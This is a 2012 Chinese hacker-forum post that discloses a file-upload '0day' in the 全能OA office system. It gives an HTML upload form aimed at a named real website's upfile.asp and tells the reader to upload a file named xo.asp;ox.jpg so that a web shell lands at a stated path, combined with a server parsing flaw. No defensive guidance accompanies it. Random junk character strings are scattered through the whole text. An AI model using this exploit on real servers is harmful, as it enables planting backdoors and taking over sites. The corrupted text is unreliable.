找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2357|回复: 0
打印 上一主题 下一主题

全能OA办公系统0day OA办公系统漏洞 上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-21 13:45:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
全能OA办公系统 上传漏洞# b7 P  |7 `# V' J  S
​5 s5 a# S8 K+ z# l1 ]
系统介绍:, s8 d9 v' \) f6 T4 D4 v

, ?4 ~9 \4 O. B: \4 _5 A全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。& N$ y2 U; i; K6 _) b

1 u  j1 N% S7 J# v主要功能:1 i! t* x/ D; L! b8 N
公司通告
& z, |! Z) `, K( m+ x( V工作计划
/ C: V* W, v$ h0 D! H+ w0 [通讯助理
* z. U# I8 Y) L- V- X3 V客户资源 $ V( m( C% S, m* H
我的公文 , R& Z$ [: b  R0 w
公文传阅
6 h! X: b. T$ T- d3 {9 R公共资源
0 w) s4 C3 \6 b2 B+ f7 t资源预约
" P; \; \" i5 [今日考勤
3 u5 }( L1 \7 @- Z; l9 P$ Z个人计划 / e  g( D; P% Q+ f' i9 ^  }
个人通讯录
- H% t+ H( t0 O) U5 M  i' \个人基本档案
: h2 c; {8 A/ L% I& Y6 r' o未读邮件 $ G% {  w% ?- G) Q: n% J4 O7 }
发邮件 % g0 r8 y0 r9 b$ |3 \' \# ?
收件夹 6 l; v1 |2 v7 n+ x8 E  D, O
寄件夹 # I0 ^6 G% h) K/ Y! B
网络硬盘
5 a% D( N0 r) v) T1 x& ~网络会议
/ `; b6 _+ D6 x+ G网络调查 3 B/ a% t: _7 T2 k$ h2 I" I
交流论坛
9 A" Q" J( |9 u! t0 s4 {! d3 ]& o1 ~; o! f5 J  b6 P6 I
有兴趣测试的朋友可以下源码看看+ w4 \. h; `) `( [" O7 m* T1 Y
0 U) u% Y2 F# y, y
源码下载:* I0 Z" y7 R- j) x) W3 w
* ~5 E$ a. ]) u$ m# A
http://www.mycodes.net/30/4750.htm$ i. e3 ]; {! ?8 d& A8 y
6 `3 Z$ `: Z  _1 _
漏洞介绍:7 j7 f8 P0 A+ j6 V9 m! M
7 W. y0 A' K0 n( ^' h
由upfile.asp上传文件漏洞引起
) O' S/ d8 `6 g' E( G
( S5 o2 `9 r% T: [; f5 z测试方法:% V# W6 J# a, K, G) l
; a+ ~$ ^9 \: s  [' C
使用名小子上传http://www.itlynn.com/upfile.asp即可
0 ]$ W, w0 A9 B- F- s4 m/ ~, H$ p0 N, i& p# z+ R
如果upfile.asp文件被删除不存在。  l. ?& w/ Z, d- \9 u- I6 G
5 i' E0 ^# W, M7 D0 O/ ]- t1 B1 g' e
  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。9 o/ E9 y  y/ f" `

0 \& A* q6 v4 p如果存在那么将如下代码保存为upfile.html。, Q! G( Y5 i6 S% ~

& F& P# n) _! K9 g然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。5 y. M% o) d+ Y" C! B, _& ~

. S6 ^' y, ~+ M, B! @   C8 ]) a& D* M. c  Y3 g* n4 C6 b2 U
% s8 }9 N1 I. f. d8 {/ C' Q
01 <table border='0' align="center" cellpadding="5">
, F/ s" g0 E# K' x) q2 `( l, w) f4 Z; }! ~7 }+ e8 r* A5 {% @& @
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
. u9 {% ?: P' Y* E1 ~7 t1 r4 j7 h3 }( W
03 <tr> $ J7 p4 G  f/ p

0 Q: h( P0 Y: X* ]( I04             <td>报错:</td>
5 ~$ H1 |% K/ A. Q1 N6 _' [7 K, y0 r5 \- E; o5 p
05             <td><input type='radio' name='errnumber' value='0'> 6 ^% C+ q* ^# S" x3 e3 o

. U9 U4 t3 w9 k# A$ c06               自动更名
7 l8 M. r- B* [- B; s5 _) X% J& O5 |' p. q
07               <input type='radio' name='errnumber' value='1' checked> 5 n5 a7 }  b% F3 k1 u( S7 a' @! Z
' b( f6 h. v  {9 p) B  G' t. Z  a2 ^
08               报错方式
$ }: q4 i$ |, ?, P* \* X6 M
" K' ~# H' o4 u9 ^09               <input type='radio' name='errnumber' value='2'>   N3 g8 n2 q2 M+ W1 A; A0 s& j$ e
& N4 q, t0 D! H
10               直接覆盖</td> ! G0 ?; {3 O  |2 T- I9 A! `* G9 |

/ Y& g. P& D9 S- O' v5 B6 j11           </tr> $ F+ ~/ f% e7 e" s/ R

3 u& Y: c* K% N0 n12           <tr> ; r3 J' X! r( j" X9 t- o/ u( t
1 h  B  z3 G4 i4 c0 G3 ]
13             <td>主题:</td> , Q' O1 Q0 Y# h5 M
5 A( f9 e+ O2 D& _
14             <td><input type='text' name='filename' size='30'></td>
$ }3 h  N0 r" b
# [1 E: K% {) T0 ?1 N15           </tr> / R: S: |6 s8 s/ |! y$ h* h
" g2 |" i: `4 \; r! g
16           <tr> - p: w8 Z9 T4 k$ D6 g) l* T

, C# ^; z5 B* c3 C  A% G+ \17             <td>文件:</td>
+ K+ v+ [! K0 ]9 q- X4 q5 L/ x: ~: _, L
18             <td><input type="file"name="fruit"size="30"></td>
# S2 l5 p8 r2 @3 i. j+ e2 ]
5 j/ h0 x7 r# @/ N( c1 K& I# t, W4 g19           </tr> , }$ V' {' a: C% P: f' x; c4 n
) l) F& {# C2 b7 j3 h- x3 o
20           <tr> / b3 d/ H9 _6 ]+ I2 l+ w

+ w6 X1 V$ k" k  P21             <td valign='top'>简介:</td> : {$ w% k& ~3 u! M/ G
, ]6 p2 e  Z: \" N
22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
" Y) Z: m- N6 t& K3 T  a+ T& e; l9 z: x6 S
23           </tr> 7 k2 g( r# `( p6 w9 K* a
3 [8 X4 s9 k/ V+ g
24   ; u# P/ M0 X8 M/ q3 [
. v% C1 Z/ Z; S
25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> 0 e5 ?& U# C" n* r! t4 ~$ [
( M* ^3 T! A. ]8 ?# J1 _
26           </tr>   p% ^  A% `. O" n9 F/ [6 b, i

3 v; _9 M3 n! n* V27         </form> ; k8 h  `: K9 o8 b! G  _. x

* d& y1 u, r; i( O& o然后打开上传一个文件名为xo.asp;ox.jpg的文件。) L% h. u% m  p' E$ \  N8 k+ n

3 U, `. l0 b9 W  {* c$ z. q + K. V  v* C7 i7 k" R' j7 _
8 g/ O3 x' o9 ]8 P
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
* t2 a- w7 i$ b% v
& j5 k# J( Q. t/ k  s& {& i/ _此漏洞需要配合解析漏洞利用。2 @' d2 a0 o; Y0 q/ L9 D+ K$ A

$ u" P+ a2 q. J0 z' U& Y% H
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表